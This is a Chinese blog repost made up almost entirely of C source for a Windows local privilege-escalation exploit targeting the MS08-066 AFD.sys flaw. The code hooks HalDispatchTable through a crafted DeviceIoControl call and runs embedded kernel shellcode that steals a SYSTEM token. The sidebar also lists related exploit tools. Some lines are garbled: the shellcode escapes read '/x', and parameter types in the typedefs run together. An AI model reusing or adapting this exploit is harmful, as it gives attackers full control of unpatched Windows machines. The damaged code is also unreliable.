ms08-066

最新推荐文章于 2024-06-19 11:43:49 发布
最新推荐文章于 2024-06-19 11:43:49 发布
阅读量1.1k 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: basic null module image byte system
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/iiprogram/article/details/3109183
  1. #include <stdio.h>
  2. #include <winsock2.h>
  3. #include <windows.h>
  5. #pragma comment(lib, "ws2_32.lib")
  7. #define NTSTATUS        int
  9. typedef struct _PROCESS_BASIC_INFORMATION {
  10. NTSTATUS ExitStatus;
  11. PVOID PebBaseAddress;
  12. ULONG AffinityMask;
  13. ULONG BasePriority;
  14. ULONG UniqueProcessId;
  15. ULONG InheritedFromUniqueProcessId;
  16. } PROCESS_BASIC_INFORMATION, *PPROCESS_BASIC_INFORMATION;
  18. typedef struct _IMAGE_FIXUP_ENTRY {
  19. USHORT        Offset:12;
  20. USHORT        Type:4;
  21. } IMAGE_FIXUP_ENTRY, *PIMAGE_FIXUP_ENTRY;
  23. typedef enum _PROCESS_IMFORMATION_CLASS {
  24. ProcessBasicInformation,
  25. ProcessQuotaLimits,
  26. ProcessIoCounters,
  27. ProcessVmCounters,
  28. ProcessTimes,
  29. ProcessBasePriority,
  30. ProcessRaisePriority,
  31. ProcessDebugPort,
  32. ProcessExceptionPort,
  33. ProcessAccessToken,
  34. ProcessLdtInformation,
  35. ProcessLdtSize,
  36. ProcessDeaultHardErrorMode,
  37. ProcessIoPortHandlers,
  38. ProcessPooledUsageAndLimits,
  39. ProcessWorkingSetWatch,
  40. ProcessUserModeIOPL,
  41. ProcessEnableAlignmentFaultFixup,
  42. ProcessPriorityClass,
  43. ProcessWx86Information,
  44. ProcessHandleCount,
  45. ProcessAffinityMask,
  46. ProcessPriorityBoost,
  47. ProcessDeviceMap,
  48. ProcessSessionInformation,
  49. ProcessForegroundInformation,
  50. ProcessWow64Information
  51. } PROCESS_INFORMATION_CLASS;
  53. typedef enum _SYSTEM_INFORMATION_CLASS {
  54. SystemBasicInformation,
  55. SystemProcessorInformation,
  56. SystemPerformanceInformation,
  57. SystemTimeOfDayInformation,
  58. SystemNotImplemented1,
  59. SystemProcessesAndThreadsInformation,
  60. SystemCallCounts,
  61. SystemConfigurationInformation,
  62. SystemProcessorTimes,
  63. SystemGlobalFlag,
  64. SystemNotImplemented2,
  65. SystemModuleInformation,
  66. SystemLockInformation,
  67. SystemNotImplemented3,
  68. SystemNotImplemented4,
  69. SystemNotImplemented5,
  70. SystemHandleInformation,
  71. SystemObjectInformation,
  72. SystemPagefileInformation,
  73. SystemInstructioEmulationCounts,
  74. SystemInvalidInfoClass1,
  75. SystemCacheInformation,
  76. SystemPoolTagInformation,
  77. SystemProcessorStatistics,
  78. SystemDpcInformation,
  79. SystemNotImplemented6,
  80. SystemLoadImage,
  81. SystemUnloadImage,
  82. SystemTimeAdjustment,
  83. SystemNotImplemented7,
  84. SystemNotImplemented8,
  85. SystemNotImplemented9,
  86. SystemCrashDumpInformation,
  87. SystemExceptionInformation,
  88. SystemCrashDumpStateInformation,
  89. SystemKernelDebuggerInformation,
  90. SystemContextSwitchInformation,
  91. SystemRegisterQuotaInformation,
  92. SystemLoadAndCallImage,
  93. SystemPrioritySeparation
  94. } SYSTEM_INFORMATION_CLASS;
  96. typedef enum _KPROFILE_SOURCE {
  97. ProfileTime,
  98. ProfileAlignmentFixup,
  99. ProfileTotalIssues,
  100. ProfilePipelineDry,
  101. ProfileLoadInstructions,
  102. ProfilePipelineFrozen,
  103. ProfileBranchInstructions,
  104. ProfileTotalNonissues,
  105. ProfileDcacheMisses,
  106. ProfileIcacheMisses,
  107. ProfileCacheMisses,
  108. ProfileBranchMispredictions,
  109. ProfileStoreInstructions,
  110. ProfileFpInstructions,
  111. ProfileIntegerInstructions,
  112. Profile2Issue,
  113. Profile3Issue,
  114. Profile4Issue,
  115. ProfileSpecialInstructions,
  116. ProfileTotalCycles,
  117. ProfileIcacheIssues,
  118. ProfileDcacheAccesses,
  119. ProfileMemoryBarrierCycles,
  120. ProfileLoadLinkedIssues,
  121. ProfileMaximum
  122. } KPROFILE_SOURCE, *PKPROFILE_SOURCE;
  124. typedef struct _UNICODE_STRING {
  125. USHORT        Length;
  126. USHORT        MaximumLength;
  127. PWSTR        Buffer;
  128. } UNICODE_STRING, *PUNICODE_STRING;
  130. typedef struct _SECTION_BASIC_INFORMATION {
  131. PVOID BaseAddress;
  132. ULONG Attributes;
  133. LARGE_INTEGER Size;
  134. }SECTION_BASIC_INFORMATION, *PSECTION_BASIC_INFORMATION;
  136. typedef struct _SYSTEM_MODULE_INFORMATION {
  137. ULONG Reserved[2];
  138. PVOID Base;
  139. ULONG Size;
  140. ULONG Flags;
  141. USHORT Index;
  142. USHORT Unknown;
  143. USHORT LoadCount;
  144. USHORT ModuleNameOffset;
  145. CHAR ImageName[256];
  146. } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
  148. typedef NTSTATUS (NTAPI *ZWQUERYINTERNALPROFILE)(ULONGPULONG);
  149. typedef NTSTATUS (NTAPI *ZWQUERYINFORMATIONPROCESS)(HANDLEULONGPVOIDULONGPULONG);
  150. typedef NTSTATUS (NTAPI *ZWQUERYSYSTEMINFORMATION)(ULONGPVOIDULONGPULONG);
  151. typedef NTSTATUS (NTAPI *ZWALLOCATEVIRTUALMEMORY)(HANDLEPVOID *, ULONGPULONGULONGULONG);
  152. typedef PIMAGE_NT_HEADERS (NTAPI *RTLIMAGENTHEADER)(PVOID);
  153. typedef PVOID (NTAPI *RTLIMAGEDIRECTORYENTRYTODATA)(PVOIDULONGUSHORTPULONG);
  155. ZWQUERYINTERNALPROFILE        ZwQueryIntervalProfile;
  156. ZWQUERYINFORMATIONPROCESS        ZwQueryInformationProcess;
  157. ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation;
  158. ZWALLOCATEVIRTUALMEMORY ZwAllocateVirtualMemory;
  159. RTLIMAGENTHEADER RtlImageNtHeader;
  160. RTLIMAGEDIRECTORYENTRYTODATA RtlImageDirectoryEntryToData;
  162. unsigned char kfunctions[64][64] =
  163. {
  164. //ntoskrnl.exe
  165. {"ZwTerminateProcess"},
  166. {"PsLookupProcessByProcessId"},
  167. {""},
  168. };
  170. unsigned char shellcode[] =
  171. "/x90/x60/x9c/xe9/xc4/x00/x00/x00/x5f/x4f/x47/x66/x81/x3f/x90/xcc"
  172. "/x75/xf8/x66/x81/x7f/x02/xcc/x90/x75/xf0/x83/xc7/x04/x64/x8b/x35"
  173. "/x38/x00/x00/x00/xad/xad/x48/x81/x38/x4d/x5a/x90/x00/x75/xf7/x95"
  174. "/x8b/xf7/x6a/x02/x59/xe8/x4d/x00/x00/x00/xe2/xf9/x8b/x4e/x0c/xe8"
  175. "/x29/x00/x00/x00/x50/x8b/x4e/x08/xe8/x20/x00/x00/x00/x5a/x8b/x7e"
  176. "/x1c/x8b/x0c/x3a/x89/x0c/x38/x56/x8b/x7e/x14/x8b/x4e/x18/x8b/x76"
  177. "/x10/xf3/xa4/x5e/x33/xc0/x50/x50/xff/x16/x9d/x61/xc3/x83/xec/x04"
  178. "/x8d/x2c/x24/x55/x51/xff/x56/x04/x85/xc0/x0f/x85/x80/x8f/x00/x00"
  179. "/x8b/x45/x00/x83/xc4/x04/xc3/x51/x56/x8b/x75/x3c/x8b/x74/x2e/x78"
  180. "/x03/xf5/x56/x8b/x76/x20/x03/xf5/x33/xc9/x49/x41/xad/x03/xc5/x33"
  181. "/xdb/x0f/xbe/x10/x85/xd2/x74/x08/xc1/xcb/x07/x03/xda/x40/xeb/xf1"
  182. "/x3b/x1f/x75/xe7/x5e/x8b/x5e/x24/x03/xdd/x66/x8b/x0c/x4b/x8b/x5e"
  183. "/x1c/x03/xdd/x8b/x04/x8b/x03/xc5/xab/x5e/x59/xc3/xe8/x37/xff/xff"
  184. "/xff/x90/x90/x90"
  186. "/x90/xcc/xcc/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
  187. "/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
  188. "/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/xcc/x90/x90/xcc";
  190. void ErrorQuit(pMsg)
  191. {
  192. printf("%sError Code:%d/n", pMsg, GetLastError());
  193. ExitProcess(0);
  194. }
  196. ULONG ComputeHash(char *ch)
  197. {
  198. ULONG ret = 0;
  200. while(*ch)
  201. {
  202. ret = ((ret << 25) | (ret >> 7)) + *ch++;
  203. }
  205. return ret;
  206. }
  208. void GetFunction()
  209. {
  210. HANDLE        hNtdll;
  212. hNtdll = LoadLibrary("ntdll.dll");
  213. if(hNtdll == NULL)
  214. ErrorQuit("LoadLibrary failed./n");
  216. ZwQueryIntervalProfile = (ZWQUERYINTERNALPROFILE)GetProcAddress(hNtdll, "ZwQueryIntervalProfile");
  217. if(ZwQueryIntervalProfile == NULL)
  218. ErrorQuit("GetProcAddress failed./n");
  220. ZwQueryInformationProcess = (ZWQUERYINFORMATIONPROCESS)GetProcAddress(hNtdll, "ZwQueryInformationProcess");
  221. if(ZwQueryInformationProcess == NULL)
  222. ErrorQuit("GetProcAddress failed./n");
  224. ZwQuerySystemInformation = (ZWQUERYSYSTEMINFORMATION)GetProcAddress(hNtdll, "ZwQuerySystemInformation");
  225. if(ZwQuerySystemInformation == NULL)
  226. ErrorQuit("GetProcessAddress failed./n");
  228. ZwAllocateVirtualMemory = (ZWALLOCATEVIRTUALMEMORY)GetProcAddress(hNtdll, "ZwAllocateVirtualMemory");
  229. if(ZwAllocateVirtualMemory == NULL)
  230. ErrorQuit("GetProcAddress failed./n");
  232. RtlImageNtHeader = (RTLIMAGENTHEADER)GetProcAddress(hNtdll, "RtlImageNtHeader");
  233. if(RtlImageNtHeader == NULL)
  234. ErrorQuit("GetProcAddress failed./n");
  236. RtlImageDirectoryEntryToData = (RTLIMAGEDIRECTORYENTRYTODATA)GetProcAddress(hNtdll, "RtlImageDirectoryEntryToData");
  237. if(RtlImageDirectoryEntryToData == NULL)
  238. ErrorQuit("GetProcAddress failed./n");
  240. FreeLibrary(hNtdll);
  241. }
  243. ULONG GetKernelBase(char *KernelName)
  244. {
  245. ULONG        i, Byte, ModuleCount, KernelBase;
  246. PVOID        pBuffer;
  247. PSYSTEM_MODULE_INFORMATION        pSystemModuleInformation;
  248. PCHAR        pName;
  250. ZwQuerySystemInformation(SystemModuleInformation, (PVOID)&Byte, 0, &Byte);
  252. if((pBuffer = malloc(Byte)) == NULL)
  253. ErrorQuit("malloc failed./n");
  255. if(ZwQuerySystemInformation(SystemModuleInformation, pBuffer, Byte, &Byte))
  256. ErrorQuit("ZwQuerySystemInformation failed/n");
  258. ModuleCount = *(PULONG)pBuffer;
  259. pSystemModuleInformation = (PSYSTEM_MODULE_INFORMATION)((PUCHAR)pBuffer + sizeof(ULONG));
  260. for(i = 0; i < ModuleCount; i++)
  261. {
  262. if((pName = strstr(pSystemModuleInformation->ImageName, "ntoskrnl.exe")) != NULL)
  263. {
  264. KernelBase = (ULONG)pSystemModuleInformation->Base;
  265. printf("Kernel is %s/n", pSystemModuleInformation->ImageName);
  266. free(pBuffer);
  267. strcpy(KernelName, "ntoskrnl.exe");
  269. return KernelBase;
  270. }
  272. if((pName = strstr(pSystemModuleInformation->ImageName, "ntkrnlpa.exe")) != NULL)
  273. {
  274. KernelBase = (ULONG)pSystemModuleInformation->Base;
  275. printf("Kernel is %s/n", pSystemModuleInformation->ImageName);
  276. free(pBuffer);
  277. strcpy(KernelName, "ntkrnlpa.exe");
  279. return KernelBase;
  280. }
  282. pSystemModuleInformation++;
  283. }
  285. free(pBuffer);
  286. return 0;
  287. }
  289. ULONG GetServiceTable(PVOID pImageBase, ULONG Address)
  290. {
  291. PIMAGE_NT_HEADERS        pNtHeaders;
  292. PIMAGE_BASE_RELOCATION        pBaseRelocation;
  293. PIMAGE_FIXUP_ENTRY        pFixupEntry;
  294. ULONG        RelocationTableSize = 0;
  295. ULONG        Offset, i, VirtualAddress, Rva;
  297. Offset = Address - (ULONG)pImageBase;
  298. pNtHeaders = (PIMAGE_NT_HEADERS)RtlImageNtHeader(pImageBase);
  299. pBaseRelocation = (PIMAGE_BASE_RELOCATION)RtlImageDirectoryEntryToData(pImageBase, TRUE, IMAGE_DIRECTORY_ENTRY_BASERELOC, &RelocationTableSize);
  300. if(pBaseRelocation == NULL)
  301. return 0;
  303. do
  304. {
  305. pFixupEntry = (PIMAGE_FIXUP_ENTRY)((ULONG)pBaseRelocation + sizeof(IMAGE_BASE_RELOCATION));
  307. RelocationTableSize = (pBaseRelocation->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) >> 1;
  308. for(i = 0; i < RelocationTableSize; i++, pFixupEntry++)
  309. {
  310. if(pFixupEntry->Type == IMAGE_REL_BASED_HIGHLOW)
  311. {
  312. VirtualAddress = pBaseRelocation->VirtualAddress + pFixupEntry->Offset;
  313. Rva = *(PULONG)((ULONG)pImageBase + VirtualAddress) - (ULONG)pNtHeaders->OptionalHeader.ImageBase;
  315. if(Rva == Offset)
  316. {
  317. if (*(PUSHORT)((ULONG)pImageBase + VirtualAddress - 2) == 0x05c7)
  318. return *(PULONG)((ULONG)pImageBase + VirtualAddress + 4) - pNtHeaders->OptionalHeader.ImageBase;
  319. }
  320. }
  321. }
  323. *(PULONG)&pBaseRelocation += pBaseRelocation->SizeOfBlock;
  325. while(pBaseRelocation->VirtualAddress);
  327. return 0;
  328. }
  330. int main(int argc, char* argv[])
  331. {
  332. PVOID                pDrivers[256];
  333. PVOID                pOldKernelInfo, pMapAddress = NULL;
  334. PULONG        pStoreBuffer, pShellcode, pFakeKernelInfo;
  335. PUCHAR        pRestoreBuffer, pBase, FunctionAddress;
  336. PROCESS_BASIC_INFORMATION pbi;
  337. SYSTEM_MODULE_INFORMATION        smi;
  338. SECTION_BASIC_INFORMATION sbi;
  339. KPROFILE_SOURCE        ProfileSource;
  340. OSVERSIONINFO        ovi;
  341. char                DriverName[256], KernelName[64];
  342. ULONG                Byte, len, i, j, k, BaseAddress, Value, KernelBase, buf[64];
  343. ULONG                HookAddress, SystemId, TokenOffset, Sections, Pid, FunctionNumber;
  344. ULONG                HDTOffset, AllocationSize;
  345. ULONG                Result;
  346. HANDLE        hKernel;
  347. WSADATA        wsad;
  348. int                sockfd;
  349. struct sockaddr_in saddr;
  351. printf("/n MS08-0xx Windows Kernel Ancillary Function Driver Local Privilege Escalation Vulnerability Exploit /n/n");
  352. printf("/t Create by SoBeIt. /n/n");
  353. if(argc != 1)
  354. {
  355. printf(" Usage:%s/n/n", argv[0]);
  356. return 1;
  357. }
  359. pFakeKernelInfo = (PULONG)malloc(256);
  361. GetFunction();
  363. if(ZwQueryInformationProcess(GetCurrentProcess(), ProcessBasicInformation, (PVOID)&pbi, sizeof(PROCESS_BASIC_INFORMATION), NULL))
  364. ErrorQuit("ZwQueryInformationProcess failed/n");
  366. KernelBase = GetKernelBase(KernelName);
  367. if(!KernelBase)
  368. ErrorQuit("Unable to get kernel base address./n");
  370. printf("Kernel base address: %x/n", KernelBase);
  372. ovi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
  374. if(!GetVersionEx(&ovi))
  375. ErrorQuit("GetVersionEx failed./n");
  377. if(ovi.dwMajorVersion != 5 && ovi.dwMajorVersion != 6)
  378. ErrorQuit("Not Windows NT family OS./n");
  380. printf("Major Version:%d Minor Version:%d/n", ovi.dwMajorVersion, ovi.dwMinorVersion);
  381. switch(ovi.dwMinorVersion)
  382. {
  383. case 0:                                                //Windows2000
  384. SystemId = 8;
  385. TokenOffset = 0x12c;
  386. break;
  388. case 1:                                                //WindowsXP
  389. SystemId = 4;
  390. TokenOffset = 0xc8;
  391. break;
  393. case 2:                                                //Windows2003
  394. SystemId = 4;
  395. TokenOffset = 0xd8;
  396. break;
  398. default:
  399. SystemId = 4;
  400. TokenOffset = 0xc8;
  401. }
  403. hKernel = LoadLibrary(KernelName);
  404. if(hKernel == NULL)
  405. ErrorQuit("LoadLibrary failed./n");
  407. printf("Load Base:%x/n", (ULONG)hKernel);
  408. HDTOffset = (ULONG)GetProcAddress(hKernel, "HalDispatchTable");
  409. HDTOffset += KernelBase - (ULONG)hKernel;
  410. printf("HalDispatchTable Offset:%x/n", HDTOffset);
  411. HookAddress = (ULONG)(HDTOffset + 4);
  412. printf("NtQueryIntervalProfile function entry address:%x/n", HookAddress);
  414. AllocationSize = 0x1000;
  415. pStoreBuffer = (PULONG)0x7fb0;
  416. if(ZwAllocateVirtualMemory((HANDLE)0xffffffff, &pStoreBuffer, 0, &AllocationSize,
  417. MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE))
  418. ErrorQuit("ZwAllocateVirtualMemory failed./n");
  420. pRestoreBuffer = malloc(0x100);
  422. memset(pStoreBuffer, 0x90, AllocationSize);
  424. pShellcode = (PULONG)shellcode;
  425. for(k = 0; pShellcode[k++] != 0x90cccc90; )
  426. ;
  428. for(j = 0; kfunctions[j][0] != '/x0'; j++)
  429. buf[j] = ComputeHash(kfunctions[j]);
  431. buf[j++] = pbi.InheritedFromUniqueProcessId;
  432. buf[j++] = SystemId;
  433. buf[j++] = (ULONG)pRestoreBuffer;
  434. buf[j++] = HookAddress;
  435. buf[j++] = 0x04;
  436. buf[j++] = TokenOffset;
  438. memcpy((char *)(pShellcode + k), (char *)buf, j * 4);
  439. memcpy((PUCHAR)0x8000, shellcode, sizeof(shellcode) - 1);
  441. if(WSAStartup(MAKEWORD(2, 2), &wsad) != 0)
  442. ErrorQuit("WSAStartup failed./n");
  444. if((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
  445. ErrorQuit("socket failed./n");
  447. saddr.sin_family = AF_INET;
  448. saddr.sin_port = htons(0x1bd);
  449. saddr.sin_addr.s_addr = 0x100007f;
  451. if(connect(sockfd, (struct sockaddr *)&saddr, sizeof(struct sockaddr)))
  452. ErrorQuit("connect failed./n");
  454. DeviceIoControl((HANDLE)sockfd, 0x1203F, NULL, 0, (PVOID)(HookAddress - 3), 0, &Result, NULL);
  456. ProfileSource = ProfileTotalIssues;
  457. ZwQueryIntervalProfile(ProfileSource, &Result);
  459. printf("Exploit finished./n");
  460. return 1;
  461. }
iiprogram
关注
开源模型应用落地-qwen2-7b-instruct-LoRA微调-ms-swift-单机单卡-V100(十二)
以微薄之力,予他人些许温暖.
08-30 4258
使用ms-swift高效微调qwen2-7b-instruct
OPenJudge--066:冷血格斗场(STL-map)
an94460061的博客
03-11 519
总时间限制: 1000ms 内存限制: 65536kB 描述 为了迎接08年的奥运会,让大家更加了解各种格斗运动,facer新开了一家冷血格斗场。格斗场实行会员制,但是新来的会员不需要交入会费,而只要同一名老会员打一场表演赛,证明自己的实力。 我们假设格斗的实力可以用一个正整数表示,成为实力值,两人的实力值可以相同。另外,每个人都有一个唯一的id,也是一个正整数。为了使得比赛...
MS08-066溢出程序
10-17
最新的MS08-066提权工具... MS08-066:Microsoft辅助驱动程序中秘密报告漏洞 可以把guest权限提为system权限...
MS08-066 Microsoft Ancillary Function Driver Elevation of Privilege exploit
10-27 1307
 from http://hi.baidu.com/vessial这个漏洞跟MS08-025类似,由于ProbeForWrite对0字节长度地址不作检测,造成可以写任何地址,SWI已经对此作了比较详细的说明,大家可以看这儿http://blogs.technet.com/swi/archive...mode-data.aspx简单描述这个漏洞PAGE:000174C3 ; int __stdc
Windows XP 核心驱动 AFD.sys 本地权限提升漏洞分析(ms08066)
weixin_34150503的博客
10-20 326
Author: PolymorphoursEmail: [email]Polymorphours@whitecell.org[/email]Homepage:[url]http://www.whitecell.org[/url]Date: 2008-10-15 漏洞模块: AFD.sys漏洞类型: 任意内核地址可写 这个漏洞又是一个可以写任意内核地址的漏洞,产生这个漏洞的原因是 Probe...
【web应用安全攻防技术】01 Web应用程序体系结构介绍
m0_57432233的博客
01-31 1291
服务器域名、IP地址、内网虚拟IP地址Web服务器端口、其他开放服务Web站点类型与版本Web应用程序类型与版本Web服务器/Web应用程序中存在的安全漏洞回顾:网络信息收集技术Whois/DNS查询、Web搜索、端口扫描:发现目标Web站点使用类型探查技术去识别Web站点OS、服务器类型版本使用漏洞扫描技术去枚举Web站点与服务器软件已知漏洞使用服务查点技术去获取Web服务器软件的“旗标”
Windows 内核漏洞 ms08025 分析
04-14 1058
4月8号microsoft再次发布了一个系统内核的补丁(KB941693),微软对该漏洞的描述为: 此安全更新解决 Windows 内核中一个秘密报告的漏洞。 成功利用此漏洞的本地攻击者可以完全控制受影响的系统。 攻击者可随后安装程序;查看、更改或删除数据;或者创建新帐户。这是用于 Windows 2000、Windows XP、Windows Server 2003、Windows Vista
Windows 海拔(持续更新).zip
12-06
这是什么本项目主要用于收集Windows...2008-1084 MS08-025 KB941693 Windows 2000/XP/Server 2003/Vista SP1/Server 2008CVE-2008-3464 MS08-066 KB910723 Windows XP/Server 2003CVE-2008-4037 MS08-068 KB887429 Wi
51-52Windows密码安全性测试与Windows提权
XLbb的博客
06-19 1418
2、kali的【ophcrack】工具彩虹表hash暴力破解。
ms08-067溢出漏洞
07-01
MS08-06最新利用工具WSS白细胞发布 溢出后开启对方的4444端口 经过测试从XP到2000、2003、Vista都可以拿下权限 对方机器要有TCP139或TCP445端口 C:\>ms08067.exe MS08-067 Remote Stack Overflow Vulnerability Exploit(POC) Create by Whitecell's Polymorphours@whitecell.org 2008/10/27 Thanks isno and PolyMeta ShellCode Function: bindshell port:4444 usage: ms08067.exe [IP] 攻击之后,正向连接对方的TCP4444端口即可。
LoadDll详解----衔接于上篇的DLL装载
For Geek
05-12 4322
根据我们上次所讲,其大概流程是差不多理清了,但是还有具体的一些细节和一个Tls的大头还没阐述,先把LoadDll的具体细节讲完,这里推荐大家去看毛德操先生的著作《内核情景分析》,这本书对ReactOS(一种也是基于NT的内核,但是不同于Windows,它是完全开源的)的解析入木三分,我读完这个DLL的装载后大有所获,所以强烈推荐这本好书!!! 好了,接下来就是我们的正题了先复习下调用流程。 Ldr...
MS14-066漏洞测试工具
iteye_16188的博客
11-22 7539
工具地址:[url]https://github.com/anexia-it/winshock-test[/url] 下载方法:[code="java"]git clone https://github.com/anexia-it/winshock-test.git[/code] 扫描原理:根据扫描支持的4中密码来判断是否有漏洞。 漏洞原理:[url]http://www.freebuf.c...
ms08_067漏洞的使用艺术
热门推荐
CODING...
11-10 1万+
ms08_067漏洞是的著名远程溢出漏洞,它的影响范围非常大,甚至一些vista的系统都会有这个远程溢出的漏洞。现在我们就使用metasploit利用ms08_067漏洞对XP虚拟机进行渗透。博主使用的是kali linux 2.0对一台windows XP SP3的虚拟机进行渗透测试。1.使用windows/shell/reverse_tcp首先我们先是用windows/shell_bind_tc
CVE-2014-4113本地提权测试
weixin_30607659的博客
04-20 220
CVE-2014-4113本地提权漏洞分析 By Netfairy 前言 2014年10月14日, Crowdstrike和FireEye发表了一篇文章, 描述了一个新的针对Windows的提权漏洞. Crowdstrike的文章表明:这一新漏洞是在追踪一个高度先进攻击团队飓风熊猫(HURRICANE PANDA)发现的, 这之前, 飓风熊猫利用此漏洞进行攻击已至少五个月了.原文http:/...
内核漏洞基础初学
zcc1414的专栏
11-06 2053
终于开始看这个东西了,等了很久,迷失自己很久了~~~~~~~~~
IIS7 HTTP.sys漏洞深入分析
gnaw0725博客
04-18 9577
http.sys漏洞影响范围 随着各方的深入分析,各地域受Windows HTTP.sys漏洞影响的情况正在逐渐浮出水面。昨天的通告信息中提到Http.sys是Microsoft Windows处理HTTP请求的内核驱动程序,据绿盟科技互联网广谱平台数据显示,全球部署IIS的系统数量大概有444万余,从目前受影响的IIS各版本分布统计数据来看,其中IIS 7.5部署量最大,占比42.3%,也是本
32触发注入过程_墨云 I 技术课堂 — 内核APC注入shellcode调试分析
weixin_39678451的博客
01-12 642
背 景Shellcode是软件漏洞利用过程中的一小段机器代码,它被攻击者用来控制目标机器。Shellcode的编写这方面被讨论的不是太多,原因是好多shellcode都是现成的,我们直接拿过来用就行了。最近在研究内核漏洞利用时,发现内核漏洞利用的shellcode更多的是用来完成提权功能的,例如,一个ring3的程序触发漏洞之后执行内核shellcode,此时shellcode只是把r...
ms14-066漏洞影响
最新发布
02-26
### MS14-066 漏洞影响范围 对于MS14-066漏洞而言,此安全更新程序解决了 Microsoft Windows 中的一个漏洞。当 Windows Kerberos 密钥分发中心 (Key Distribution Center, KDC) 不正确处理请求时,存在远程执行代码漏洞。成功利用此漏洞的攻击者可以在目标系统的上下文中运行任意代码并控制该系统[^1]。 受影响的操作系统涵盖了多个版本: - **Windows Server 2003** - **Windows Vista** - **Windows Server 2008** - **Windows 7** - **Windows Server 2008 R2** - **Windows 8 和 Windows RT** - **Windows Server 2012** - **Windows 8.1 和 Windows RT 8.1** - **Windows Server 2012 R2** 值得注意的是,尽管上述列出了广泛的操作系统版本受到影响,但实际风险取决于具体环境配置和其他因素。例如,在某些情况下,仅域控制器会受到威胁,因为只有它们通常扮演着KDC的角色。 为了保护网络免受此类攻击的影响,建议及时安装来自供应商的安全补丁,并采取其他适当措施来增强安全性。 ```powershell # PowerShell脚本可以用来检查系统是否已应用KB2992611补丁 Get-HotFix | Where-Object { $_.HotFixID -eq 'KB2992611' } ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值